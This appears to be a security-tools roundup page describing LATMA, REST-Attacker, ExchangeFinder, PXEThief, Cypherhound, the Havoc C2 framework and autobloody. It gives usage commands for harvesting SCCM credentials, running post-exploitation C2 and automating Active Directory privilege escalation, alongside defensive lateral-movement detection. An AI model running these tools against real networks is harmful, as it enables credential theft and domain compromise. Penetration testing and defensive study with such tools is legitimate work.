SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernรกndez (@TheXC3LL)

References



LATMA - Lateral Movement Analyzer Tool


Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. It contains two modules: one that collects the logs and one that analyzes them. You can execute each module separately; the event log collector should be executed on a Windows machine in an Active Directory domain environment with Python 3.8 or above, while the analyzer can be executed on either a Linux or a Windows machine.


The Collector

The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S (ports 389 and 636) and RPC (port 135) access to the domain controller and clients. In addition, it requires domain admin privileges, membership in the Event Log Readers group, or equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as output a comma-delimited CSV file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credentials of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in the Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be given as NetBIOS names, not IP addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attacker's movement. The lateral movement graph is not always a path in the sub-graph; in some attacks the attacker goes in many different directions.

  • Alert: A sub-graph the algorithm suspects is part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period, every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentications; otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services "rpc", "rpcss" and "termsrv".

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches accounts to the machines they frequently authenticate from. If an account authenticates from a machine on at least three different days in a three-week period, the account is matched to that machine, and any authentication of this account from the machine is considered benign and removed from the authentication graph.
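
As a rough illustration of the sink/hub classification (not LATMA's actual code; the thresholds come from the text above and the CSV column names are assumed from the collector's field list):

import csv
from collections import defaultdict

SINK_THRESHOLD = 50  # distinct accounts authenticating *to* a machine
HUB_THRESHOLD = 20   # distinct accounts authenticating *from* a machine

accounts_to = defaultdict(set)
accounts_from = defaultdict(set)

with open("logs.csv", newline="") as f:  # collector output
    for row in csv.DictReader(f):
        accounts_from[row["source host"]].add(row["username"])
        accounts_to[row["destination"]].add(row["username"])

sinks = {m for m, u in accounts_to.items() if len(u) >= SINK_THRESHOLD}
hubs = {m for m, u in accounts_from.items() if len(u) >= HUB_THRESHOLD}
# Authentications to sinks or from hubs are considered benign and are
# removed from the authentication graph.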

The lateral movement IoCs are:

White cane - User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and, following that, from machine B to machine C. This IoC potentially indicates an attacker advancing from its initial foothold (A) to a destination machine that better serves the attack's objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being an admin user).

Weight Shift - White cane (see above) from machine A to machines {B1,…, Bn}, followed by another White cane from machine Bx to machines {C1,…,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attack's purposes and from now on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants/executes ransomware on a large number of machines simultaneously.

Output:

The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification, and a separate spreadsheet with the authentications suspected to be part of lateral movement (propagation.csv)
  2. A GIF file representing the progression, whereby each frame of the GIF specifies exactly what the suspicious action was
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color

Dependencies:

  1. Python 3.8
  2. Libraries as listed in requirements.txt
  3. Run pip install . to run the setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.

Usage

The Collector

Required arguments:

  1. credentials - in the format [domain.com/]username[:password]; alternatively, provide [domain.com/]username and the password will be prompted for securely. For the domain, insert the FQDN (Fully Qualified Domain Name).

Optional arguments:
  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query a specific OU or container in the domain; this will include all workstations in sub-OUs as well. Each OU should be in DN (Distinguished Name) format. Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from, in month-day-year format; if not specified, all available data is taken
  8. -threads Number of worker threads to use
  9. -ldap Use unsecured LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file - the authentication file should contain a list of NTLM and Kerberos requests

Optional arguments:

  2. -output_file The location where the CSV with all the IoCs will be saved
  3. -progression_output_file The location where the CSV with the IoCs of the lateral movements will be saved
  4. -sink_threshold Number of accounts from which a machine is considered a sink, default is 50
  5. -hub_threshold Number of accounts from which a machine is considered a hub, default is 20
  6. -learning_period Learning period in days, default is 7 days
  7. -show_all_iocs Show IoCs that are not connected to any other IoCs
  8. -show_gant If true, output the events in a Gantt format

Binary Usage

Open a command prompt and navigate to the binary folder. Run the executables with the arguments specified above.

Examples

In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python eventlogcollector.py domain.com/username:password -ntlm -kerberos
  2. python analyzer.py logs.csv


REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations


REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.

REST-Attacker is maintained by the Chair of Network & Data Security at Ruhr University Bochum.


Features

REST-Attacker currently provides these features:

  • Automated generation of tests
    • Utilize an OpenAPI description to automatically generate test runs
    • 32 integrated security tests based on OWASP and other scientific contributions
    • Built-in creation of security reports
  • Streamlined API communication
    • Custom request interface for the REST security use case (based on the Python3 requests module)
    • Communicate with any generic REST API
  • Handling of access control
    • Background authentication/authorization with API
    • Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
  • Easy to use & extend
    • Usable as standalone (CLI) tool or as a module
    • Adapt test runs to specific APIs with extensive configuration options
    • Create custom test cases or access control schemes with the tool's interfaces

Install

Get the tool by downloading or cloning the repository:

git clone https://github.com/RUB-NDS/REST-Attacker.git

You need Python >3.10 to run the tool.

You also need to install the following packages with pip:

python3 -m pip install -r requirements.txt

Quickstart

Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and on the available configuration options in our usage guides.

Get the list of supported test cases:

python3 -m rest_attacker --list

Basic test run (with load-time test case generation):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate

Full test run (with load-time and runtime test case generation + rate limit handling):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits

Test run with only selected test cases (only generates test cases for scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters

Rerun a test run from a report:

python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json

Documentation

Usage guides and configuration format documentation can be found in the documentation subfolders.

Troubleshooting

For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.

Contributing

Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code amendments via a pull request.

Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.

License

This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.



ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version


ExchangeFinder is a simple and open-source tool that tries to find Microsoft Exchange instances for a given domain based on the most common DNS names for Microsoft Exchange.

ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.


How does it work?

ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange servers, then it will send a couple of HTTP requests and parse the content of the server's response to identify whether it's running Microsoft Exchange.

Currently, the tool has a signature for every Microsoft Exchange version from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the X-OWA-Version header it can identify the exact version.
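
The detection idea can be sketched in a few lines of Python (this is not ExchangeFinder's code; the single mapping entry is illustrative only):

import requests

BUILD_MAP = {"15.1.2375": "Exchange Server 2016 CU22"}  # example entry

def identify_exchange(host):
    # OWA responses include the build number in the X-OWA-Version header
    resp = requests.get(f"https://{host}/owa", timeout=10, verify=False)
    build = resp.headers.get("X-OWA-Version")
    if build is None:
        return None
    prefix = ".".join(build.split(".")[:3])
    return BUILD_MAP.get(prefix, f"Unknown Exchange build {build}")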

If the tool finds a valid Microsoft Exchange instance, it will return the following results:

  • Domain name.
  • Microsoft Exchange version.
  • Login page.
  • Web server version.

Installation & Requirements

Clone the latest version of ExchangeFinder using the following command:

git clone https://github.com/mhaskar/ExchangeFinder

And then install all the requirements using the command poetry install.

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$ poetry install 1 โจฏ
Installing dependencies from lock file


Package operations: 15 installs, 0 updates, 0 removals

โ€ข Installing pyparsing (3.0.9)
โ€ข Installing attrs (22.1.0)
โ€ข Installing certifi (2022.6.15)
โ€ข Installing charset-normalizer (2.1.1)
โ€ข Installing idna (3.3)
โ€ข Installing more-itertools (8.14.0)
โ€ข Installing packaging (21.3)
โ€ข Installing pluggy (0.13.1)
โ€ข Installing py (1.11.0)
โ€ข Installing urllib3 (1.26.12)
โ€ข Installing wcwidth (0.2.5)
โ€ข Installing dnspython (2.2.1)
โ€ข Installing pytest (5.4.3)
โ€ข Installing requests (2.28.1)
โ€ข Installing termcolor (1.1.0)
Installing the current project: ExchangeFinder (0.1.0)

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$ python3 exchangefinder.py


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[-] Please use --domain or --domains option

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$

Usage

You can use the option -h to show the help banner:

Scan single domain

To scan a single domain, you can use the --domain option like the following:

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป python3 exchangefinder.py --domain dummyexchangetarget.com                                                                                           


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[!] Scanning domain dummyexchangetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.

[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://autodiscover.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป

Scan multiple domains

To scan multiple domains (targets), you can use the --domains option and choose a file like the following:

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป python3 exchangefinder.py --domains domains.txt                                                                                                          


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records found for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.

[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.

[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป

Please note that the examples used in the screenshots are resolved in the lab only

This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances. Feel free to open a PR if you find any issue or have something new to add.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details



PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager


PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collection Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly overpermissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.

Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.


Usage Instructions

python pxethief.py -h 
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text

pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.

Configuration Options

A file contained in the main PXEThief folder ('settings.ini') is used to set more static configuration options. These are as follows:

[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =

[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0

[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1

Scapy settings

  • automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1 it will attempt to use the interface that can reach the machine's default gateway as the output interface (see the sketch after this list). If set to 2, it will look for the first interface that it finds that has an IP address that is not an autoconfiguration or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific interface with 'manual_interface_selection_by_id'.
  • manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.
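
As a rough sketch of technique 1 (assumed behaviour, not PXEThief's exact code), Scapy's routing table can be queried for the interface that reaches the default gateway:

from scapy.all import conf

# route() returns (interface, outgoing source IP, gateway) for a destination
iface, src_ip, gateway = conf.route.route("0.0.0.0")
print(f"Selected interface {iface} (source IP {src_ip}, gateway {gateway})")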

General settings

  • sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
  • auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.

HTTP Connection Settings

Not implemented in this release

Setup Instructions

  1. Create a new Windows VM
  2. Install Python (From https://www.python.org/ or through the store, both should work fine)
  3. Install all the requirements through pip (pip install -r requirements.txt)
  4. Install Npcap (https://npcap.com/#download) (or Wireshark, which comes bundled with it) for Scapy
  5. Bridge the VM to the network running a ConfigMgr Distribution Point set up for PXE/OSD
  6. If using pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one; if it is not, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10

Limitations

  • Proxy support for HTTP requests - Currently only configurable in code. Proxy support can be enabled on line 35 of pxethief.py and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base
  • HTTPS and mutual TLS support - Not implemented at the moment. Can use an intercepting proxy to handle this though, which works well in my experience; to do this, you will need to configure a proxy as mentioned above
  • Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

Proof of Concept note

Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.

Related work

Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.

DEF CON 30 Slides - Link to the talk slides

Author Credit

Copyright (C) 2022 Christopher Panayi, MWR CyberSec



Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets


A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.

Why?

BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:

  1. My tools think in lists - until my tools parse exported JSON graphs, I need graph results in a line-by-line format .txt file
  2. Copy/pasting graph results - this plays into the first but do we need to explain this one?
  3. Graphs can be too large to draw - the information contained in any graph can aid our goals as the attacker and we need to be able to view all data efficiently
  4. Manually running custom cyphers is time-consuming - let's automate it :)

This tool can also help blue teams to reveal detailed information about their Active Directory environments as well.


Features

Take back control of your BloodHound data with cypherhound!

  • 264 cyphers to date
    • Set cyphers to search based on user input (user, group, and computer-specific)
    • User-defined regex cyphers
  • User-defined exporting of all results
    • Default export will be just end object to be used as target list with tools
    • Raw export option available in grep/cut/awk-friendly format

Installation

Make sure to have python3 installed and run:

python3 -m pip install -r requirements.txt

Usage

Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>
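
Under the hood, tools like this run Cypher queries against the Neo4j database that backs BloodHound. A minimal sketch of that pattern (not cypherhound's code; the query, credentials and group name are illustrative) using the official Python driver:

from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))
query = (
    "MATCH (u:User)-[:MemberOf*1..]->(g:Group) "
    "WHERE g.name = $group RETURN u.name AS member"
)
with driver.session() as session:
    for record in session.run(query, group="DOMAIN ADMINS@DOMAIN.LOCAL"):
        print(record["member"])  # line-by-line output, ready for other tools
driver.close()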

Commands

The full command menu is shown below:

Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the name of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu

Important Notes

  • The program is configured to use the default Neo4j database and URI
  • Built for BloodHound 4.2.0, certain edges will not work for previous versions
  • Windows users must run pip3 install pyreadline3
  • Shortest paths exports are all the same (raw or not) due to their unpredictable number of nodes

Future Goals

  • Add cyphers for Azure edges

Issues and Support

Please be descriptive with any issues you decide to open and if possible provide output (if applicable).



Havoc - Modern and malleable post-exploitation command and control framework


Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.


Support

Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.

Quick Start

Please see the Wiki for complete documentation.

Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.

See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.


Features

Client

Cross-platform UI written in C++ and Qt

  • Modern, dark theme based on Dracula

Teamserver

Written in Golang

  • Multiplayer
  • Payload generation (exe/shellcode/dll)
  • HTTP/HTTPS listeners
  • Customizable C2 profiles
  • External C2

Demon

Havoc's flagship agent written in C and ASM

  • Sleep Obfuscation via Ekko or FOLIAGE
  • x64 return address spoofing
  • Indirect Syscalls for Nt* APIs
  • SMB support
  • Token vault
  • Variety of built-in post-exploitation commands

Extensibility


Community

You can join the official Havoc Discord to chat with the community!

Contributing

To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!



Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound


autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.

Description

This tool automates AD privesc between two AD objects: the source (the one we own) and the target (the one we want), provided a privesc path exists in the BloodHound database. The automation is composed of two steps:

  • Finding the optimal privesc path using BloodHound data and Neo4j queries.
  • Executing the path found using the bloodyAD package

Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.


Installation

First if you run it on Linux, you must have libkrb5-dev installed on your OS in order for kerberos to work:

# Debian/Ubuntu/Kali
apt-get install libkrb5-dev

# Centos/RHEL
yum install krb5-devel

# Fedora
dnf install krb5-devel

# Arch Linux
pacman -S krb5

A python package is available:

pip install autobloody

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .

Dependencies

  • bloodyAD
  • Neo4j python driver
  • Neo4j with the GDS library
  • BloodHound
  • Python 3
  • Gssapi (linux) or Winkerberos (Windows)

How to use it

First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.

โš ๏ธ
-ds and -dt values are case sensitive

Simple usage:

autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'

Full help:

[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST

AD Privesc Automation

options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
